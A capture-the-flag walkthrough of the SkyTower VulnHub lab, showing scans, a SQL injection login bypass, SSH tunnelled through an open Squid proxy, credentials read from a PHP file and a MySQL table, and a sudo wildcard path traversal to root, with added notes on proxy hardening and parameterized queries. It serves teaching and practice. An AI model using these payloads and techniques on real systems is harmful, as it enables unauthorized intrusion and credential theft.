Vulnhub

Skytower

Let’s start with the usual, nmap.

nmap -sS -sC -A -p- -T 4 -
Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-25 21:59 EDT
Nmap scan report for SkyTower (192.168.1.137)
Host is up (0.0044s latency).
Not shown: 65532 closed ports
PORT     STATE    SERVICE    VERSION
22/tcp   filtered ssh
80/tcp   open     http       Apache httpd 2.2.22 ((Debian))
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Site doesn't have a title (text/html).
3128/tcp open     http-proxy Squid http proxy 3.1.20
|_http-server-header: squid/3.1.20
|_http-title: ERROR: The requested URL could not be retrieved
MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.10, Linux 3.2 - 3.16
Network Distance: 1 hop

Let’s send nikto to find stuff.

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.137
+ Target Hostname:    192.168.1.137
+ Target Port:        80  
+ Start Time:         2017-05-25 22:00:42 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Debian)
+ Server leaks inodes via ETags, header found with file /, inode: 87, size: 1136, mtime: Fri Jun 20 07:23:36 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS 
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Retrieved x-powered-by header: PHP/5.4.4-14+deb7u9
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST 
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 8346 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2017-05-25 22:00:53 (GMT-4) (11 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Alright, let’s see what’s on the website.

Website

We get a login page and the page source doesn’t have much. Let’s see if MySQL is running in the background by trying to trigger an error:

' or 1 # -- 
There was an error running the query [You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right
syntax to use near '1 # ' and password=''' at line 1]

So we do have MySQL. Let’s try some of the usual payloads in the form.

After maybe 30 minutes of trying different things, I found that this request lets us log in. The quotes turn each comparison into email=''*'', i.e. email = 0, and MySQL’s string-to-number coercion makes that true for every row, so the first account comes back:

email='*'&password='*'

Once logged in, we’re greeted with this.

Welcome [email protected]

As you may know, SkyTech has ceased all international operations.

To all our long term employees, we wish to convey our thanks for your dedication and hard work.

Unfortunately, all international contracts, including yours have been terminated.

The remainder of your contract and retirement fund, $2 ,has been payed out in full to a secure account. For security reasons, you must login to the SkyTech server via SSH to access the account details.

Username: john
Password: hereisjohn 

We wish you the best of luck in your future endeavors. 

That’s cool, a free SSH login!

SSH

Trying to connect via SSH directly isn’t working (nmap reported port 22 as filtered). Uh huh… So I would assume that we need to use their proxy to tunnel our connection to the SSH port.

We’ll configure proxychains to use the http proxy that squid is providing.

vi /etc/proxychains.conf

http 192.168.1.137 3128

We have to make sure to comment out the other proxies.
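The tunnel works because this Squid instance forwards CONNECT requests to port 22 on the same host. As an added illustration (not the VM’s actual squid.conf, which the walkthrough never shows), here is the kind of permissive rule set that allows it, next to stock-style rules that confine CONNECT to SSL ports:

```conf
# Assumed permissive set-up: any client may CONNECT to any host:port through the proxy
acl CONNECT method CONNECT
http_access allow all

# Stock-style restriction: CONNECT only to 443, and only from the local network
acl localnet src 192.168.1.0/24
acl SSL_ports port 443
acl Safe_ports port 80 443
acl CONNECT method CONNECT
http_access deny !Safe_ports
http_access deny CONNECT !SSL_ports
http_access allow localnet
http_access deny all
```

With the second set the CONNECT to 192.168.1.137:22 is refused, and the denied request still lands in access.log with its host:port, which is the line to alert on.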

proxychains ssh [email protected]
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-192.168.1.137:3128-<><>-192.168.1.137:22-<><>-OK
[email protected]'s password: 
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri May 26 12:33:56 2017 from 192.168.1.137

Funds have been withdrawn
Connection to 192.168.1.137 closed.

Well shit, our connection gets closed automatically. We’ll tell ssh to execute a command when it connects:

proxychains ssh [email protected] /bin/bash

ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-192.168.1.137:3128-<><>-192.168.1.137:22-<><>-OK
[email protected]'s password: 
id
uid=1000(john) gid=1000(john) groups=1000(john)

We’re in.

Enumeration

Like always, the kernel first:

uname -a
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64 GNU/Linux

Alright, there might be something we can do with that kernel version.

Let’s look at the ports listening.

netstat -ntlp
(No info could be read for "-p": geteuid()=1000 but you should be root.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN
tcp6       0      0 :::80                   :::*                    LISTEN
tcp6       0      0 :::22                   :::*                    LISTEN
tcp6       0      0 :::3128                 :::*                    LISTEN

Oh yeah, that’s right, it has a vulnerable MySQL database behind that login. That means the web application most probably has a configuration file or source that contains the credentials for the MySQL service.

cd /var/www
cat login.php

...
$db = new mysqli('localhost', 'root', 'root', 'SkyTech');
...
$sql= "SELECT * FROM login where email='".$email."' and password='".$password."';";
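
The query in login.php is the bug that the syntax-error probe at the top of the page triggered, and the root/root credentials turn any injection into a full database compromise. This added example (not the walkthrough’s code) rebuilds that exact concatenation over a constructed sqlite3 table next to the parameterized form that fixes it; the e-mail addresses are made up:

```python
import sqlite3

# Constructed stand-in for the page's SkyTech 'login' table (sqlite3 here, MySQL on the VM).
# Column layout (id, email, password) follows the page; the addresses are made up.
SEED_ROWS = [
    (1, "john@skytower.example", "hereisjohn"),
    (2, "sara@skytower.example", "ihatethisjob"),
]

def make_db():
    """In-memory database seeded with the constructed rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE login (id INTEGER, email TEXT, password TEXT)")
    db.executemany("INSERT INTO login VALUES (?, ?, ?)", SEED_ROWS)
    return db

def vulnerable_login(db, email, password):
    """The string concatenation from login.php: whatever the user types is parsed as SQL.
    Returns (row, error); error is the parser message the page's form displayed verbatim."""
    sql = ("SELECT * FROM login where email='" + email
           + "' and password='" + password + "';")
    try:
        return db.execute(sql).fetchone(), None
    except sqlite3.Error as exc:
        return None, str(exc)

def safe_login(db, email, password):
    """Hardened form: bound parameters keep the input a string value, so quotes,
    comment markers or operators inside it can never alter the query's structure."""
    return db.execute("SELECT * FROM login WHERE email=? AND password=?",
                      (email, password)).fetchone()

if __name__ == "__main__":
    db = make_db()
    probe = "' or 1 # -- "                   # the syntax-breaking probe from the page
    print(vulnerable_login(db, probe, ""))   # row is None, error holds the parser message
    print(safe_login(db, probe, ""))         # None: no account has that literal e-mail
    print(safe_login(db, "john@skytower.example", "hereisjohn"))
```

The other two defects the page surfaces, plaintext passwords in the table and the application connecting as the MySQL root user, are fixed outside this snippet: hash the stored passwords and give the web app its own least-privilege database account.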

So root/root, huh, and it looks like the table is called login. So we have a database name (SkyTech) and we know where to look for those logins.

mysql -u root -p
Enter password: root
use SkyTech;
select * from login;
id      email   password
1       [email protected]        hereisjohn
2       [email protected]        ihatethisjob
3       [email protected]     senseable

So there, more logins. Let’s look at their sudo rights. After checking them, John doesn’t seem to have any, and William’s password doesn’t even work?

So the only one that has something good for us is Sara, and it is good stuff. Running commands as root, the dream!

sudo -l 
Matching Defaults entries for sara on this host:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sara may run the following commands on this host:
    (root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*

By the looks of it, the wildcard in those two rules will let us traverse the filesystem with our two commands.

sudo /bin/ls /accounts/../root/
flag.txt

sudo /bin/cat /accounts/../root/flag.txt
Congratz, have a cold one to celebrate!
root password is theskytower
 
proxychains ssh [email protected] /bin/sh -i
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-192.168.1.137:3128-<><>-192.168.1.137:22-<><>-OK
[email protected]'s password: 
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)

So that’s that. GG.